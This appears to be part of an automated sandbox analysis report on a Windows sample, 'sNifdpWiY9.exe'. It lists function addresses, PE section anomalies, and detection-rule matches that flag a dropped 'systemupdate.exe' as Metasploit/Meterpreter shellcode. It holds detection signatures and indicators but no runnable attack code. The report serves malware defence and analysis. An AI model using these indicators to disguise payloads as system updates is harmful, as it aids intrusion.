Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F94EEE0	19_2_00007FF75F94EEE0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8ECF0A	19_2_00007FF75F8ECF0A
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8D3F00	19_2_00007FF75F8D3F00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8F9EFD	19_2_00007FF75F8F9EFD
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8DDE20	19_2_00007FF75F8DDE20
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8D7E80	19_2_00007FF75F8D7E80
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F905E00	19_2_00007FF75F905E00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8E8CD0	19_2_00007FF75F8E8CD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8F2CDF	19_2_00007FF75F8F2CDF
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F914C70	19_2_00007FF75F914C70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F916B90	19_2_00007FF75F916B90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F909AD0	19_2_00007FF75F909AD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8E2AF0	19_2_00007FF75F8E2AF0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8F9AF0	19_2_00007FF75F8F9AF0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F904AE0	19_2_00007FF75F904AE0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8E3A20	19_2_00007FF75F8E3A20
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8C1A90	19_2_00007FF75F8C1A90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8F6A90	19_2_00007FF75F8F6A90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F984A00	19_2_00007FF75F984A00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F913A10	19_2_00007FF75F913A10
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8D8920	19_2_00007FF75F8D8920
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8C6840	19_2_00007FF75F8C6840
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F9D1868	19_2_00007FF75F9D1868
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F9037D0	19_2_00007FF75F9037D0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8DD720	19_2_00007FF75F8DD720
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F912790	19_2_00007FF75F912790
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F9D1788	19_2_00007FF75F9D1788
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F9D1760	19_2_00007FF75F9D1760
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8D96C0	19_2_00007FF75F8D96C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F9D1700	19_2_00007FF75F9D1700
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F9D16F8	19_2_00007FF75F9D16F8
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8BD710	19_2_00007FF75F8BD710
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F90A620	19_2_00007FF75F90A620
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8EB640	19_2_00007FF75F8EB640
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8F2670	19_2_00007FF75F8F2670
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8FE530	19_2_00007FF75F8FE530
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8D1540	19_2_00007FF75F8D1540
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8C1580	19_2_00007FF75F8C1580
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F9024B0	19_2_00007FF75F9024B0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8FB4CD	19_2_00007FF75F8FB4CD
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F9114B0	19_2_00007FF75F9114B0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8C54E0	19_2_00007FF75F8C54E0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8EC418	19_2_00007FF75F8EC418
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8F1460	19_2_00007FF75F8F1460
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8EA480	19_2_00007FF75F8EA480
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F9083D0	19_2_00007FF75F9083D0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8C8240	19_2_00007FF75F8C8240
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F9101F0	19_2_00007FF75F9101F0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F94D180	19_2_00007FF75F94D180
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F901160	19_2_00007FF75F901160
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F90B190	19_2_00007FF75F90B190
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 19_2_00007FF75F8F4181	19_2_00007FF75F8F4181
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8B50C0	22_2_00007FF75F8B50C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8CF0C0	22_2_00007FF75F8CF0C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8FB0C0	22_2_00007FF75F8FB0C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F9510F0	22_2_00007FF75F9510F0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8F8050	22_2_00007FF75F8F8050
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8F0080	22_2_00007FF75F8F0080
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8FEFD0	22_2_00007FF75F8FEFD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F908F20	22_2_00007FF75F908F20
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8C9F90	22_2_00007FF75F8C9F90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F94EEE0	22_2_00007FF75F94EEE0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8ECF0A	22_2_00007FF75F8ECF0A
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8D3F00	22_2_00007FF75F8D3F00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8F9EFD	22_2_00007FF75F8F9EFD
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8DDE20	22_2_00007FF75F8DDE20
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8D7E80	22_2_00007FF75F8D7E80
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F905E00	22_2_00007FF75F905E00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8E8CD0	22_2_00007FF75F8E8CD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8F2CDF	22_2_00007FF75F8F2CDF
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F914C70	22_2_00007FF75F914C70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F916B90	22_2_00007FF75F916B90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F909AD0	22_2_00007FF75F909AD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8E2AF0	22_2_00007FF75F8E2AF0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8F9AF0	22_2_00007FF75F8F9AF0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F904AE0	22_2_00007FF75F904AE0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8E3A20	22_2_00007FF75F8E3A20
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8C1A90	22_2_00007FF75F8C1A90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8F6A90	22_2_00007FF75F8F6A90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F984A00	22_2_00007FF75F984A00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F913A10	22_2_00007FF75F913A10
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8D8920	22_2_00007FF75F8D8920
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8C6840	22_2_00007FF75F8C6840
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F9D1868	22_2_00007FF75F9D1868
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F9037D0	22_2_00007FF75F9037D0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8DD720	22_2_00007FF75F8DD720
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F912790	22_2_00007FF75F912790
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F9D1788	22_2_00007FF75F9D1788
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F9D1760	22_2_00007FF75F9D1760
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8D96C0	22_2_00007FF75F8D96C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F9D1700	22_2_00007FF75F9D1700
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F9D16F8	22_2_00007FF75F9D16F8
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8BD710	22_2_00007FF75F8BD710
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F90A620	22_2_00007FF75F90A620
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8EB640	22_2_00007FF75F8EB640
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8F2670	22_2_00007FF75F8F2670
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8FE530	22_2_00007FF75F8FE530
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8D1540	22_2_00007FF75F8D1540
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8C1580	22_2_00007FF75F8C1580
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F9024B0	22_2_00007FF75F9024B0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8FB4CD	22_2_00007FF75F8FB4CD
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F9114B0	22_2_00007FF75F9114B0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8C54E0	22_2_00007FF75F8C54E0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8EC418	22_2_00007FF75F8EC418
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8F1460	22_2_00007FF75F8F1460
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8EA480	22_2_00007FF75F8EA480
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F9083D0	22_2_00007FF75F9083D0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8C8240	22_2_00007FF75F8C8240
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F9101F0	22_2_00007FF75F9101F0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F94D180	22_2_00007FF75F94D180
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F901160	22_2_00007FF75F901160
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F90B190	22_2_00007FF75F90B190
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 22_2_00007FF75F8F4181	22_2_00007FF75F8F4181

Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: String function: 000001DE4A3F65C0 appears 33 times
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: String function: 00007FF75F9980C0 appears 480 times
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: String function: 00007FF75F9567E0 appears 50 times
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: String function: 00007FF75F8BFCF0 appears 170 times
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: String function: 00007FF75F997210 appears 120 times
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: String function: 00007FF75F983880 appears 65 times
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: String function: 00007FF75F983BD0 appears 40 times
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: String function: 00007FF75F998250 appears 300 times
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: String function: 00007FF75F8BEB00 appears 35 times
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: String function: 00007FF75F9973B0 appears 140 times
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: String function: 00007FF75F97FEE0 appears 35 times
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: String function: 00007FF75F9975A0 appears 35 times
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: String function: 00007FF75F9981B0 appears 415 times
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: String function: 00007FF75F8B3490 appears 55 times
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: String function: 00007FF75F8BBD70 appears 35 times
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: String function: 00007FF75F8CAED0 appears 35 times

Source: antietat[1].exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: sNifdpWiY9.exe	Static PE information: Number of sections : 20 > 10
Source: systemupdate.exe.0.dr	Static PE information: Number of sections : 11 > 10

Source: 9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_38b8ceec os = windows, severity = x86, description = Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342, id = 38b8ceec-601c-4117-b7a0-74720e26bf38, last_modified = 2021-08-23
Source: 9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Meterpreter author = ditekSHen, description = Detects Meterpreter payload
Source: 9.2.systemupdate.exe.1de4a3d0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_38b8ceec os = windows, severity = x86, description = Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342, id = 38b8ceec-601c-4117-b7a0-74720e26bf38, last_modified = 2021-08-23
Source: 9.2.systemupdate.exe.1de4a3d0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 9.2.systemupdate.exe.1de4a3d0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 9.2.systemupdate.exe.1de4a3d0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Meterpreter author = ditekSHen, description = Detects Meterpreter payload
Source: 9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_38b8ceec os = windows, severity = x86, description = Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342, id = 38b8ceec-601c-4117-b7a0-74720e26bf38, last_modified = 2021-08-23
Source: 9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Meterpreter author = ditekSHen, description = Detects Meterpreter payload
Source: 9.2.systemupdate.exe.1de4a410000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_38b8ceec os = windows, severity = x86, description = Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342, id = 38b8ceec-601c-4117-b7a0-74720e26bf38, last_modified = 2021-08-23
Source: 9.2.systemupdate.exe.1de4a410000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 9.2.systemupdate.exe.1de4a410000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 9.2.systemupdate.exe.1de4a410000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Meterpreter author = ditekSHen, description = Detects Meterpreter payload
Source: 9.2.systemupdate.exe.1de4a6736a0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_38b8ceec os = windows, severity = x86, description = Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342, id = 38b8ceec-601c-4117-b7a0-74720e26bf38, last_modified = 2021-08-23
Source: 9.2.systemupdate.exe.1de4a6736a0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 9.2.systemupdate.exe.1de4a6736a0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 9.2.systemupdate.exe.1de4a6736a0.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Meterpreter author = ditekSHen, description = Detects Meterpreter payload
Source: 9.2.systemupdate.exe.1de4a3d4000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 9.2.systemupdate.exe.1de4a3d4000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Meterpreter author = ditekSHen, description = Detects Meterpreter payload
Source: 00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_38b8ceec os = windows, severity = x86, description = Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342, id = 38b8ceec-601c-4117-b7a0-74720e26bf38, last_modified = 2021-08-23
Source: 00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_38b8ceec os = windows, severity = x86, description = Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342, id = 38b8ceec-601c-4117-b7a0-74720e26bf38, last_modified = 2021-08-23
Source: 00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
